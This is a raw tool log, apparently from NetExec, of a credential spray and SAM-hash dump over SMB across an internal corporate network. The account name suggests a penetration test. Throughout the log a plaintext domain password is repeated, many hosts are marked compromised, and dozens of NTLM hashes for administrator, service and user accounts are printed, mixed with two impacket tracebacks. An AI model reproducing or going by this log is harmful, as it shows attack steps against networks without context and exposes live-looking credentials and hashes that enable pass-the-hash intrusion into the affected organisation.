


│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.89 445 INTERHM [-] interhm\oxxo_pentest:p8Z49-


#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.129 445 OXOASP02004
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.165.7 445 CUMAX3 [*] Windows Embedded Standard
7600 x32 (name:CUMAX3) (domain:CUMAX3) (signing:False) (SMBv1:True)
SMB 10.34.165.4 445 CUMAX2 [*] Windows Embedded Standard
7600 x32 (name:CUMAX2) (domain:CUMAX2) (signing:False) (SMBv1:True)
SMB 10.34.162.132 445 OXXVSRV2000
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:9af19f79617da5c7c8ef2e25bcd1d54
e:::
SMB 10.34.165.1 445 CUMAX1 [*] Windows Embedded Standard
7600 x32 (name:CUMAX1) (domain:CUMAX1) (signing:False) (SMBv1:True)
SMB 10.34.162.132 445 OXXVSRV2000
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.129 445 OXOASP02004
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8c9879dbdf02d3d459e600e81d0
67cfc:::
SMB 10.34.162.129 445 OXOASP02004 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.139 445 OXOASP02002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.132 445 OXXVSRV2000
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.135 445 OXOASP02011 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.132 445 OXXVSRV2000
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7c923a024ebcf2ab2fd5d8afa29
f24f0:::
SMB 10.34.162.139 445 OXOASP02002 [*] Dumping SAM hashes
SMB 10.34.162.132 445 OXXVSRV2000 KL-AK-
C5AE50C3A1EB7F:1012:aad3b435b51404eeaad3b435b51404ee:5162fbb15fc5b0c9755be60fe38ff7
7f:::
SMB 10.34.162.135 445 OXOASP02011 [*] Dumping SAM hashes
SMB 10.34.162.142 445 OXOAST02003 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.132 445 OXXVSRV2000
KlPxeUser:1015:aad3b435b51404eeaad3b435b51404ee:8bdad50a02b727e03e83ff4c38b0464a:::
SMB 10.34.162.139 445 OXOASP02002
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:70bb1209c9d307949fe63b9431fb209
e:::
SMB 10.34.162.139 445 OXOASP02002
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.132 445 OXXVSRV2000
KlScSvc:1016:aad3b435b51404eeaad3b435b51404ee:a757a87f19b7428df33c1b84215a5f95:::
SMB 10.34.162.132 445 OXXVSRV2000 [+] Added 7 SAM hashes to the
database
SMB 10.34.162.142 445 OXOAST02003 [*] Dumping SAM hashes
SMB 10.34.162.140 445 OXOASP02018 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.135 445 OXOASP02011
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:fdc06cc7a1664773dba55f7d5b77ba8
7:::
SMB 10.34.162.139 445 OXOASP02002
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.152 445 LA26300001 [-] La26300001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.135 445 OXOASP02011
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.139 445 OXOASP02002
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:c8df66acc8b3417a462494d976b
e8546:::
SMB 10.34.162.139 445 OXOASP02002 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.140 445 OXOASP02018 [*] Dumping SAM hashes
SMB 10.34.162.156 445 OXOASP02016 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.135 445 OXOASP02011
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.142 445 OXOAST02003
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:97512c0bf450fc6b50336505b51355c
d:::
SMB 10.34.162.142 445 OXOAST02003
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.135 445 OXOASP02011
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:2e05b089d3dad977792c56c1325
25155:::
SMB 10.34.162.135 445 OXOASP02011 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.141 445 OXOBIP02001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.156 445 OXOASP02016 [*] Dumping SAM hashes
SMB 10.34.162.140 445 OXOASP02018
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:d1d66a63125f38a3f7f82228c70f70f
a:::
SMB 10.34.162.142 445 OXOAST02003
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.140 445 OXOASP02018
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.141 445 OXOBIP02001 [*] Dumping SAM hashes
SMB 10.34.162.158 445 OXODBP02002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.142 445 OXOAST02003
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:772a906d41766929c2032f17ba5
7ffc1:::
SMB 10.34.162.142 445 OXOAST02003 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.156 445 OXOASP02016
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:b2b5a94e7cb6e67a25d98dadffab0f8
a:::
SMB 10.34.162.140 445 OXOASP02018
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.156 445 OXOASP02016
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.149 445 OXOASP02017 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.158 445 OXODBP02002 [*] Dumping SAM hashes
SMB 10.34.162.140 445 OXOASP02018
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:57c905b0544e4dfe6dad63c5681
8c35f:::
SMB 10.34.162.140 445 OXOASP02018 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.156 445 OXOASP02016
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.141 445 OXOBIP02001
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:88c8bba349849de0882bfe70ba43d3a
e:::
SMB 10.34.162.141 445 OXOBIP02001
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.156 445 OXOASP02016
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3adb763429cdd99d2d90b0d89da
b2454:::
SMB 10.34.162.156 445 OXOASP02016 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.149 445 OXOASP02017 [*] Dumping SAM hashes
SMB 10.34.162.143 445 OXOSCCM02001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.141 445 OXOBIP02001
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.158 445 OXODBP02002
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:078674db879ebaf11a1d44f35d375f0
5:::
SMB 10.34.162.160 445 OXOPMP02001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.158 445 OXODBP02002
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.149 445 OXOASP02017
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:1ca935a2349ded0a845f05d0699e36d
b:::
SMB 10.34.162.141 445 OXOBIP02001
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ac8e207770231bea5f0c205a022
3605b:::
SMB 10.34.162.141 445 OXOBIP02001 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.143 445 OXOSCCM02001 [*] Dumping SAM hashes
SMB 10.34.162.158 445 OXODBP02002
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.149 445 OXOASP02017
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.161 445 OXOPMP02002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.160 445 OXOPMP02001 [*] Dumping SAM hashes
SMB 10.34.162.158 445 OXODBP02002
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d816769c1dbc3082da92dc79496
40c99:::
SMB 10.34.160.60 445 6120C-112 [+] 6120C-112\
oxxo_pentest:p8Z49-#MX6?ki@ (Guest)
SMB 10.34.162.149 445 OXOASP02017
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.158 445 OXODBP02002 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.143 445 OXOSCCM02001
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:be1ff10272c4d51cbdf2c3c9cdf7088
c:::
SMB 10.34.162.149 445 OXOASP02017
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:47f7206d1b9f5ec91f61e124d02
d24a6:::
SMB 10.34.162.149 445 OXOASP02017 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.161 445 OXOPMP02002 [*] Dumping SAM hashes
SMB 10.34.162.153 445 OXOASD02001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.143 445 OXOSCCM02001
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.166 445 OXOASP02005 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.162.160 445 OXOPMP02001
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:0b82516e1265b42df7d77d6a250d8c7
c:::
SMB 10.34.162.143 445 OXOSCCM02001
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.160 445 OXOPMP02001
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.152 445 OXOBSP02001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.153 445 OXOASD02001 [*] Dumping SAM hashes
SMB 10.34.162.160 445 OXOPMP02001
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.161 445 OXOPMP02002
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:fe4dc9c8f85c75ed9b9ab3607600d9d
9:::
SMB 10.34.162.143 445 OXOSCCM02001
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:503ce6b40f049aea1dfe407eab4
71d1a:::
SMB 10.34.162.143 445 OXOSCCM02001 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.161 445 OXOPMP02002
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.160 445 OXOPMP02001
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:86ad2b9a914d5f52168a10ab5c6
8b60e:::
SMB 10.34.162.160 445 OXOPMP02001 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.152 445 OXOBSP02001 [*] Dumping SAM hashes
SMB 10.34.162.146 445 OXOASP02009 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.159 445 OXOASP02010 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.162.153 445 OXOASD02001
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:e32f18e0abb84358a102ffcfff2b64d
4:::
SMB 10.34.162.161 445 OXOPMP02002
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.153 445 OXOASD02001
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.146 445 OXOASP02009 [*] Dumping SAM hashes
SMB 10.34.162.161 445 OXOPMP02002
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d54ffc46922d71d049f21418da9
fcf27:::
SMB 10.34.162.192 445 OXOASP02024 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.161 445 OXOPMP02002 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.152 445 OXOBSP02001
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:3d38c27d9b204e491ba1538dd1776c5
8:::
SMB 10.34.162.153 445 OXOASD02001
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.152 445 OXOBSP02001
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.152 445 OXOBSP02001
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.146 445 OXOASP02009
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:96b2ecd9ad8c2ec25f3474173e49174
0:::
SMB 10.34.162.152 445 OXOBSP02001
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bf8890e8536fe025410c06adaa4
d90fa:::
SMB 10.34.162.152 445 OXOBSP02001 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.146 445 OXOASP02009
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.153 445 OXOASD02001
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:59e01e7e2833a7556461ecb1e53
e2262:::
SMB 10.34.162.153 445 OXOASD02001 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.170 445 OXOASP02015 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.146 445 OXOASP02009
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.146 445 OXOASP02009
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:2005003856c2cb204132ae11199
728a6:::
SMB 10.34.162.146 445 OXOASP02009 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.171 445 OXOASP02019 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.22 445 OXODT020009 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.162.188 445 OXOBSP02002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:06] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.162.133 445 OXXVSRV2001 [-] Connection Error: [Errno


104] Connection reset by peer
SMB 10.34.162.171 445 OXOASP02019 [*] Dumping SAM hashes
SMB 10.34.162.170 445 OXOASP02015 [*] Dumping SAM hashes
SMB 10.34.162.134 445 OXXVSRV2002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.188 445 OXOBSP02002 [*] Dumping SAM hashes
SMB 10.34.162.4 445 4005073-001 [-] 4005073-001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.1 445 4004794-001 [-] 4004794-001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.7 445 4005074-001 [-] 4005074-001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.171 445 OXOASP02019
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0c27dcdaeb91fbe289d732694156f701
:::
SMB 10.34.162.5 445 4004832-002 [-] 4004832-002\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.2 445 4004353-007 [-] 4004353-007\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.6 445 4004832-001 [-] 4004832-001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.3 445 4004353-001 [-] 4004353-001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.8 445 4004795-001 [-] 4004795-001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.253 445 OXBBALSCSRV01 [+] cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Guest)
SMB 10.34.163.1 445 L2-MLR [-] L2-MLR\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.171 445 OXOASP02019
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.134 445 OXXVSRV2002 [*] Dumping SAM hashes
SMB 10.34.162.188 445 OXOBSP02002
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:a1a4b0682984648c9b13f5d45de820c
a:::
SMB 10.34.162.171 445 OXOASP02019
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.170 445 OXOASP02015
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f95e8a98837d3b6a26d62653016ab01
:::
SMB 10.34.163.6 445 L2-SV800-232 [-] L2-SV800-232\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.28 445 L2-SSK-003 [-] L2-SSK-003\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.26 445 L1-SERVER-PC [-] L1-Server-Pc\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.34 445 L3-MLR [-] L3-MLR\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.48 445 L3-SERVER-PC [-] L3-SERVER-PC\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.45 445 L3-VPA1084-2 [-] L3-VPA1084-2\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.188 445 OXOBSP02002
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.163.55 445 L4-SERVER-PC [-] L4-SERVER-PC\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.80 445 L1-MLR [-] L1-MLR\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.31 445 L2-SERVER-PC [-] L2-SERVER-PC\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.196 445 L-2090093059 [-] L-2090093059\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.197 445 L-2244778003 [-] L-2244778003\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.170 445 OXOASP02015
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.163.206 445 L-2100577031 [-] L-2100577031\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.202 445 L-2100577026 [-] L-2100577026\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.171 445 OXOASP02019
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b3d363281c457c9237575f757a9
62203:::
SMB 10.34.162.171 445 OXOASP02019 [+] Added 4 SAM hashes to the
database
SMB 10.34.163.203 445 L-2100577021 [-] L-2100577021\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.210 445 L-2100577018 [-] L-2100577018\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.209 445 L-2100577015 [-] L-2100577015\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.221 445 L-2244778007 [-] L-2244778007\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.224 445 L-2090093031 [-] L-2090093031\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.134 445 OXXVSRV2002
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:4e40aa560406c5e78cb75a714293af6
a:::
SMB 10.34.163.225 445 L-2090093021 [-] L-2090093021\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.188 445 OXOBSP02002
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.163.228 445 L-2090093035 [-] L-2090093035\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.235 445 SOSO-PC [-] soso-PC\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.163.239 445 SOSO-PC [-] soso-PC\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.170 445 OXOASP02015
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.162.134 445 OXXVSRV2002
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.188 445 OXOBSP02002
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:64ea1ddd9ad7ac17897c7cd8b54
fd400:::
SMB 10.34.162.188 445 OXOBSP02002 [+] Added 4 SAM hashes to the
database
SMB 10.34.164.33 445 OXXKASTOSL01 [+] OXXKASTOSL01\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.164.131 445 HPCZJ5240FXG [-] HPCZJ5240FXG\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.164.138 445 OXXNSRV2001 [+] OXXNSRV2001\
oxxo_pentest:p8Z49-#MX6?ki@
SMB 10.34.162.170 445 OXOASP02015
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1473ee17878e1e9a30244d7e196
2c230:::
SMB 10.34.160.96 445 OXOLT020017 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.162.170 445 OXOASP02015 [+] Added 4 SAM hashes to the
database
SMB 10.34.162.134 445 OXXVSRV2002
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.164.33 445 OXXKASTOSL01 [*] Dumping SAM hashes
SMB 10.34.162.134 445 OXXVSRV2002
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:12500cafb9401e24637fa5ab174
65b64:::
SMB 10.34.162.134 445 OXXVSRV2002 [+] Added 4 SAM hashes to the
database
SMB 10.34.164.33 445 OXXKASTOSL01
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9a366b3fead2e41b44e71b75cd28c200
:::
SMB 10.34.164.33 445 OXXKASTOSL01
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.164.33 445 OXXKASTOSL01
KASTO:1003:aad3b435b51404eeaad3b435b51404ee:c7875605d5ec3aba795f9f16f072bed7:::
SMB 10.34.164.33 445 OXXKASTOSL01
reko:1006:aad3b435b51404eeaad3b435b51404ee:634deaeb3e692a1ad5604be37a2b048d:::
SMB 10.34.164.33 445 OXXKASTOSL01
dsi.oxxo_admin:1008:aad3b435b51404eeaad3b435b51404ee:e5538373ac8834fef3bb48546e0c0c
ff:::
SMB 10.34.164.33 445 OXXKASTOSL01
oxxo_pentest:1009:aad3b435b51404eeaad3b435b51404ee:e83e19aa4caedd3777928f050dfdd460
:::
SMB 10.34.164.33 445 OXXKASTOSL01 [+] Added 6 SAM hashes to the
database
SMB 10.34.165.7 445 CUMAX3 [-] CUMAX3\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.165.4 445 CUMAX2 [-] CUMAX2\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.165.1 445 CUMAX1 [-] CUMAX1\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
